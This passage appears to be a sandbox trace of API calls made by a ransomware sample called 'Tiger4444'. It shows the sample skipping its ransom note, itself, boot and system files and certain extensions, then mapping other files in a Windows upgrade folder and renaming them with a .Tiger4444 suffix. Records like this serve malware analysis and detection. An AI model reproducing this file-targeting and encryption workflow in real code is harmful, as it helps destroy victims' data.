hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea38cadd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea38cadd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="esdstub.dll", cAlternateFileName="")) returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="Tiger4444.exe") returned -1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2=".") returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="..") returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="windows") returned -1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="bootmgr") returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="pagefile.sys") returned -1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="boot") returned 1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="ids.txt") returned -1 [0039.477] lstrcmpiW (lpString1="esdstub.dll", lpString2="NTUSER.DAT") returned -1 [0039.477] lstrcpyW (in: lpString1=0x30aead0, lpString2="esdstub.dll" | out: lpString1="esdstub.dll") returned="esdstub.dll" [0039.477] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\esdstub.dll", dwFileAttributes=0x0) returned 1 [0039.484] lstrlenW (lpString="esdstub.dll") returned 11 [0039.484] lstrlenW (lpString="Tiger4444") returned 9 [0039.484] lstrcmpiW (lpString1="dstub.dll", lpString2="Tiger4444") returned -1 [0039.484] lstrlenW (lpString=".dll") returned 4 [0039.484] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0039.484] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea38de7f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea38de7f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x89ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GatherOSState.EXE", cAlternateFileName="GATHER~1.EXE")) returned 1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="Tiger4444.exe") returned -1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2=".") returned 1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="..") returned 1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="windows") returned -1 [0039.484] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="bootmgr") returned 1 [0039.485] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="pagefile.sys") returned -1 [0039.485] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="boot") returned 1 [0039.485] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="ids.txt") returned -1 [0039.485] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="NTUSER.DAT") returned -1 [0039.485] lstrcpyW (in: lpString1=0x30aead0, lpString2="GatherOSState.EXE" | out: lpString1="GatherOSState.EXE") returned="GatherOSState.EXE" [0039.485] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GatherOSState.EXE", dwFileAttributes=0x0) returned 1 [0039.485] lstrlenW (lpString="GatherOSState.EXE") returned 17 [0039.485] lstrlenW (lpString="Tiger4444") returned 9 [0039.485] lstrcmpiW (lpString1="State.EXE", lpString2="Tiger4444") returned -1 [0039.485] lstrlenW (lpString=".dll") returned 4 [0039.485] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0039.485] lstrlenW (lpString=".lnk") returned 4 [0039.485] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0039.485] lstrlenW (lpString=".ini") returned 4 [0039.485] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0039.485] lstrlenW (lpString=".sys") returned 4 [0039.485] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0039.485] CreateFileW (lpFileName="C:\\Windows10Upgrade\\GatherOSState.EXE" (normalized: "c:\\windows10upgrade\\gatherosstate.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0039.485] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0039.485] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13093845082) returned 1 [0039.485] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=564936) returned 1 [0039.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0039.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0039.486] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a1d0, lpName=0x0) returned 0x2cc [0039.487] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a1d0) returned 0x33b0000 [0039.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0039.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0039.801] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13125440816) returned 1 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0039.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0039.801] UnmapViewOfFile (lpBaseAddress=0x33b0000) returned 1 [0039.806] CloseHandle (hObject=0x2cc) returned 1 [0039.806] CloseHandle (hObject=0x2c8) returned 1 [0039.816] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\GatherOSState.EXE.Tiger4444") returned 47 [0039.816] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\GatherOSState.EXE" (normalized: "c:\\windows10upgrade\\gatherosstate.exe"), lpNewFileName="C:\\Windows10Upgrade\\GatherOSState.EXE.Tiger4444" (normalized: "c:\\windows10upgrade\\gatherosstate.exe.tiger4444"), dwFlags=0x1) returned 1 [0039.817] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=564944 | out: Addend=0xc6f980) returned 817888 [0039.817] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=315 | out: Addend=0xc6f98c) returned 1040 [0039.817] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39058e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39058e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x83cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentDeploy.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="Tiger4444.exe") returned -1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2=".") returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="..") returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="windows") returned -1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="bootmgr") returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="pagefile.sys") returned -1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="boot") returned 1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="ids.txt") returned -1 [0039.817] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="NTUSER.DAT") returned -1 [0039.818] lstrcpyW (in: lpString1=0x30aead0, lpString2="GetCurrentDeploy.dll" | out: lpString1="GetCurrentDeploy.dll") returned="GetCurrentDeploy.dll" [0039.818] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentDeploy.dll", dwFileAttributes=0x0) returned 1 [0039.818] lstrlenW (lpString="GetCurrentDeploy.dll") returned 20 [0039.818] lstrlenW (lpString="Tiger4444") returned 9 [0039.818] lstrcmpiW (lpString1="eploy.dll", lpString2="Tiger4444") returned -1 [0039.818] lstrlenW (lpString=".dll") returned 4 [0039.818] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0039.818] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea392ca4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea392ca4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~2.DLL")) returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Tiger4444.exe") returned -1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".") returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="..") returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="windows") returned -1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootmgr") returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="pagefile.sys") returned -1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="boot") returned 1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ids.txt") returned -1 [0039.818] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="NTUSER.DAT") returned -1 [0039.818] lstrcpyW (in: lpString1=0x30aead0, lpString2="GetCurrentOOBE.dll" | out: lpString1="GetCurrentOOBE.dll") returned="GetCurrentOOBE.dll" [0039.818] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentOOBE.dll", dwFileAttributes=0x0) returned 1 [0039.819] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0039.819] lstrlenW (lpString="Tiger4444") returned 9 [0039.819] lstrcmpiW (lpString1="tOOBE.dll", lpString2="Tiger4444") returned 1 [0039.819] lstrlenW (lpString=".dll") returned 4 [0039.819] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0039.819] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39539e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39539e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x11ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentRollback.EXE", cAlternateFileName="GETCUR~1.EXE")) returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="Tiger4444.exe") returned -1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2=".") returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="..") returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="windows") returned -1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="bootmgr") returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="pagefile.sys") returned -1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="boot") returned 1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="ids.txt") returned -1 [0039.819] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="NTUSER.DAT") returned -1 [0039.819] lstrcpyW (in: lpString1=0x30aead0, lpString2="GetCurrentRollback.EXE" | out: lpString1="GetCurrentRollback.EXE") returned="GetCurrentRollback.EXE" [0039.819] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE", dwFileAttributes=0x0) returned 1 [0039.820] lstrlenW (lpString="GetCurrentRollback.EXE") returned 22 [0039.820] lstrlenW (lpString="Tiger4444") returned 9 [0039.820] lstrcmpiW (lpString1="lback.EXE", lpString2="Tiger4444") returned -1 [0039.820] lstrlenW (lpString=".dll") returned 4 [0039.820] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0039.820] lstrlenW (lpString=".lnk") returned 4 [0039.820] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0039.820] lstrlenW (lpString=".ini") returned 4 [0039.820] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0039.820] lstrlenW (lpString=".sys") returned 4 [0039.820] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0039.820] CreateFileW (lpFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0039.820] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0039.820] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13127352476) returned 1 [0039.820] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=73416) returned 1 [0039.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0039.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0039.821] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x121d0, lpName=0x0) returned 0x2cc [0039.822] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x121d0) returned 0xc20000 [0039.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0039.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0039.977] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0039.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.977] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0039.977] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13143060386) returned 1 [0039.978] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0039.978] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0039.978] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0039.978] CloseHandle (hObject=0x2cc) returned 1 [0039.978] CloseHandle (hObject=0x2c8) returned 1 [0039.981] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\GetCurrentRollback.EXE.Tiger4444") returned 52 [0039.981] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe"), lpNewFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE.Tiger4444" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe.tiger4444"), dwFlags=0x1) returned 1 [0039.981] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=73424 | out: Addend=0xc6f980) returned 1382832 [0039.981] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=157 | out: Addend=0xc6f98c) returned 1355 [0039.981] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39673d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39673d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x6cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HttpHelper.exe", cAlternateFileName="HTTPHE~1.EXE")) returned 1 [0039.981] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0039.981] lstrcmpiW (lpString1="HttpHelper.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.981] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="Tiger4444.exe") returned -1 [0039.981] lstrcmpiW (lpString1="HttpHelper.exe", lpString2=".") returned 1 [0039.981] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="..") returned 1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="windows") returned -1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="bootmgr") returned 1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="pagefile.sys") returned -1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="boot") returned 1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="ids.txt") returned -1 [0039.982] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="NTUSER.DAT") returned -1 [0039.982] lstrcpyW (in: lpString1=0x30aead0, lpString2="HttpHelper.exe" | out: lpString1="HttpHelper.exe") returned="HttpHelper.exe" [0039.982] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\HttpHelper.exe", dwFileAttributes=0x0) returned 1 [0039.982] lstrlenW (lpString="HttpHelper.exe") returned 14 [0039.982] lstrlenW (lpString="Tiger4444") returned 9 [0039.982] lstrcmpiW (lpString1="elper.exe", lpString2="Tiger4444") returned -1 [0039.982] lstrlenW (lpString=".dll") returned 4 [0039.982] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0039.982] lstrlenW (lpString=".lnk") returned 4 [0039.982] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0039.982] lstrlenW (lpString=".ini") returned 4 [0039.982] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0039.982] lstrlenW (lpString=".sys") returned 4 [0039.982] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0039.982] CreateFileW (lpFileName="C:\\Windows10Upgrade\\HttpHelper.exe" (normalized: "c:\\windows10upgrade\\httphelper.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0039.982] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0039.982] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13143548599) returned 1 [0039.982] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=27848) returned 1 [0039.982] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0039.983] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0039.983] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6fd0, lpName=0x0) returned 0x2cc [0039.984] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6fd0) returned 0xc20000 [0040.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0040.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0040.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0040.025] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0040.025] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13147801012) returned 1 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0040.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0040.025] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0040.025] CloseHandle (hObject=0x2cc) returned 1 [0040.025] CloseHandle (hObject=0x2c8) returned 1 [0040.027] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\HttpHelper.exe.Tiger4444") returned 44 [0040.027] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\HttpHelper.exe" (normalized: "c:\\windows10upgrade\\httphelper.exe"), lpNewFileName="C:\\Windows10Upgrade\\HttpHelper.exe.Tiger4444" (normalized: "c:\\windows10upgrade\\httphelper.exe.tiger4444"), dwFlags=0x1) returned 1 [0040.028] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=27856 | out: Addend=0xc6f980) returned 1456256 [0040.028] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=42 | out: Addend=0xc6f98c) returned 1512 [0040.028] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PostOOBEScript.cmd", cAlternateFileName="POSTOO~1.CMD")) returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="Tiger4444.exe") returned -1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2=".") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="..") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="windows") returned -1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="bootmgr") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="pagefile.sys") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="boot") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="ids.txt") returned 1 [0040.028] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="NTUSER.DAT") returned 1 [0040.028] lstrcpyW (in: lpString1=0x30aead0, lpString2="PostOOBEScript.cmd" | out: lpString1="PostOOBEScript.cmd") returned="PostOOBEScript.cmd" [0040.028] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd", dwFileAttributes=0x0) returned 1 [0040.281] lstrlenW (lpString="PostOOBEScript.cmd") returned 18 [0040.281] lstrlenW (lpString="Tiger4444") returned 9 [0040.281] lstrcmpiW (lpString1="cript.cmd", lpString2="Tiger4444") returned -1 [0040.281] lstrlenW (lpString=".dll") returned 4 [0040.281] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0040.281] lstrlenW (lpString=".lnk") returned 4 [0040.281] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0040.281] lstrlenW (lpString=".ini") returned 4 [0040.281] lstrcmpiW (lpString1=".cmd", lpString2=".ini") returned -1 [0040.281] lstrlenW (lpString=".sys") returned 4 [0040.281] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0040.281] CreateFileW (lpFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd" (normalized: "c:\\windows10upgrade\\postoobescript.cmd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0040.281] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0040.281] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13173437559) returned 1 [0040.281] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 